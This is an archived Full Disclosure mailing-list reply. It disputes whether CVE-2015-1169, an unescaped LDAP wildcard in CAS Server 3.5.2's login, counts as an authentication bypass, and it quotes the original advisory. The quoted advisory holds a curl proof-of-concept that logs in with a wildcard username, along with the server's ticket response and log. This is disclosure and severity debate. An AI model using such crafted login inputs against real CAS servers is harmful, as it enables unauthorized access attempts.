[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20150129014835.GD4951@bender.unx.csupomona.edu>
Date: Wed, 28 Jan 2015 17:48:35 -0800
From: "Paul B. Henson" <henson@....org>
To: fulldisclosure@...lists.org
Subject: Re: [FD] CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers
to bypass LDAP authentication via crafted wildcards.
This CVE claims CAS has a vulnerability that "allows remote attackers to
bypass LDAP authentication via crafted wildcards". My understanding of
an "authentication bypass" vulnerability is one that actually bypasses
authentication, accessing a resource without having to authenticate, as
enumerated at http://cwe.mitre.org/data/definitions/592.html
The actual vulnerability here is that if you are using the LDAP
authenticator that does a search for the supplied username and then
authenticates against the DN returned (as opposed to the LDAP
authenticator that directly constructs a bind DN from the username), it
does not properly escape wildcards in the supplied username when it does
the search, allowing you to authenticate with a username consisting of a
wildcard that matches the username *AND* the valid password for that
username. In addition, the supplied wildcard must match one and only one
entry in the ldap directory, as authentication will fail otherwise.
I don't think this is in any way an authentication bypass.
Authentication is being performed with an (almost valid) username and a
valid password, and while the issue does allow you to use a username
that's not an exact match, it still requires you to know the correct
password for that username and for the "not exact" match to be so
specific as to only match one user.
On Wed, Jan 21, 2015 at 12:49:38PM -0200, J. Tozo wrote:
> =====[Alligator Security Team - Security Advisory]========
>
> CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to bypass LDAP
> authentication via crafted wildcards.
>
> Reporter: José Tozo < juniorbsd () gmail com >
>
> =====[Table of Contents]==================================
>
> 1. Background
> 2. Detailed description
> 3. Other contexts & solutions
> 4. Timeline
> 5. References
>
> =====[1. Background]======================================
>
> CAS is an authentication system originally created by Yale University to
> provide a trusted way for an application to authenticate a user.
>
> =====[2. Detailed description]============================
>
> A valid username and password required.
>
> Given a username johndoe and a password superpass, you can sucessfully
> achieve login using wildcards:
>
> username: jo*
> password: superpass
>
> The login will be sucessfully only if the ldap bind search return one
> unique member.
>
> The vulnerability described in this document can be validated using the
> following example:
>
> Client Request:
> root@...hine:/# curl -k -L -d "username=jo%2A&password=superpass"
> https://login.cas-server.com/v1/tickets
>
> (note that * was url encoded to %2A)
>
> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
> <html>
> <head>
> <title>201 The request has been fulfilled and resulted in a new
> resource being created</title>
> </head>
> <body>
> <h1>TGT Created</h1>
> <form action="
> https://xxx.xxx.xxx.xxx/v1/tickets/TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz"
> method="POST">Service:<input type="text" name="service" value=""><br><input
> type="submit" value="Submit"></form>
> </body>
> </html>
>
> Server log:
> =============================================================
> WHO: [username: jo*]
> WHAT: TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz
> ACTION: TICKET_GRANTING_TICKET_CREATED
> APPLICATION: CAS
> WHEN: Tue Jan 20 18:38:17 BRST 2015
> CLIENT IP ADDRESS: xxx.xxx.xxx.xxx
> SERVER IP ADDRESS: xxx.xxx.xxx.xxx
> =============================================================
>
> =====[3. Other contexts & solutions]======================
>
> In order to apply the patch, you have to update at least to version 3.5.3.
> Newer versions, such as CAS 4.0.0 and above, are not vulnerable.
>
> =====[4. Timeline]========================================
>
> 29/12/14 Vendor notification.
> 14/01/15 Vendor rolled out new version 3.5.3
> 17/01/15 Mitre assigned CVE-2015-1169.
> 21/01/15 Disclosure date.
>
> =====[5. References]=======================================
>
> 1 - https://github.com/Jasig/cas/pull/411
> 2 -
> https://github.com/Jasig/cas/commit/7de61b4c6244af9ff8e75a2c92a570f3b075309c
>
> --
> Grato,
>
> Tozo
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists